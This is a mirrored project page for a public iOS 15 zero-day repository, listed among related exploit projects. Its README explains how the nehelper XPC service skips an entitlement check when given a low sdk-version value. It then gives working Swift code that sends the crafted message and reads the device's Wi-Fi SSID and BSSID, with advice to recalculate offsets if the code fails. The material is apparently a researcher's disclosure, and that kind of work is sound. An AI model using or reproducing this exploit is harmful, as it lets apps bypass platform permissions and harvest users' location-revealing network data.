GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → illusionofchaos → ios-nehelper-wifi-info-0day

illusionofchaos / ios-nehelper-wifi-info-0day

Licence: other
iOS 15 0-day exploit (still works in 15.0.2)

Programming Languages

swift
15916 projects
c
50402 projects - #5 most used programming language

Labels

ios0dayios15

Projects that are alternatives of or similar to ios-nehelper-wifi-info-0day

ios-gamed-0day
iOS gamed exploit (fixed in 15.0.2)
Stars: ✭ 437 (+163.25%)
Mutual labels:  0day, ios15
ios-nehelper-enum-apps-0day
iOS 15 0-day exploit (still works in 15.0.2)
Stars: ✭ 156 (-6.02%)
Mutual labels:  0day, ios15
BoxFeed
News App 📱 built to demonstrate the use of SwiftUI 3 features, Async/Await, CoreData and MVVM architecture pattern.
Stars: ✭ 112 (-32.53%)
Mutual labels:  ios15
RTSPhuzz
RTSPhuzz - An RTSP Fuzzer written using the Boofuzz framework
Stars: ✭ 33 (-80.12%)
Mutual labels:  0day
fix4log4j
No description or website provided.
Stars: ✭ 21 (-87.35%)
Mutual labels:  0day
K8tools
K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix)
Stars: ✭ 4,173 (+2413.86%)
Mutual labels:  0day
Exploit-Development
Exploit Development - Weaponized Exploit and Proof of Concepts (PoC)
Stars: ✭ 84 (-49.4%)
Mutual labels:  0day
Disclosures
Public Disclosures
Stars: ✭ 63 (-62.05%)
Mutual labels:  0day
discord-bugs-exploits
A Collection of Various Discord Bugs, Exploits, Un-Documented Parts of the Discord API, and Other Discord Related Miscellaneous Stuff.
Stars: ✭ 22 (-86.75%)
Mutual labels:  0day
prl guest to host
Guest to host VM escape exploit for Parallels Desktop
Stars: ✭ 26 (-84.34%)
Mutual labels:  0day
ProxyLogon
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)
Stars: ✭ 112 (-32.53%)
Mutual labels:  0day
Widget-Blur
This script for the Scriptable app creates widget backgrounds that appear to be transparent. You can also optionally emulate the light or dark blur effect used in the Batteries widget from Apple.
Stars: ✭ 113 (-31.93%)
Mutual labels:  ios15
HighlightJSON
A tiny Safari Web Extension for presenting highlighted JSON files
Stars: ✭ 30 (-81.93%)
Mutual labels:  ios15
iOS-Shortcuts-Reference
Reference documentation for the iOS Shortcuts app file structure
Stars: ✭ 89 (-46.39%)
Mutual labels:  ios15
BottomSheet
Access UISheetPresentationController in SwiftUI on iOS 15 using a simple .bottomSheet modifier.
Stars: ✭ 332 (+100%)
Mutual labels:  ios15
StoreHelper
Implementing and testing In-App Purchases with StoreKit2 and StoreHelper in Xcode 13, Swift 5.5, SwiftUI, iOS 15 and macOS 12.
Stars: ✭ 158 (-4.82%)
Mutual labels:  ios15
Harbour
Docker/Portainer management app for iOS
Stars: ✭ 210 (+26.51%)
Mutual labels:  ios15

Nehelper Wifi Info 0-day (iOS 15.0)

I've updated this code to avoid using Private API directly. Read more in my blog post. However, that means that now this code is iOS version-specific and possibly device model-specific. So if it doesn't work on your device, recalculate and update the offsets in c.c file. The original code can be found in direct branch.

XPC endpoint com.apple.nehelper accepts user-supplied parameter sdk-version, and if its value is less than or equal to 524288, com.apple.developer.networking.wifi-info entiltlement check is skipped. Ths makes it possible for any qualifying app (e.g. posessing location access authorization) to gain access to Wifi information without the required entitlement. This happens in -[NEHelperWiFiInfoManager checkIfEntitled:] in /usr/libexec/nehelper.

func wifi_info() -> String? {
    let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10)
    xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely
    xpc_dictionary_set_string(xdict, "interface-name", "en0")
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    if let result = xpc_dictionary_get_value(reply, "result-data") {
        let ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
        let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
        return "SSID: \(ssid)\nBSSID: \(bssid)"
    } else {
        return nil
    }
}
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].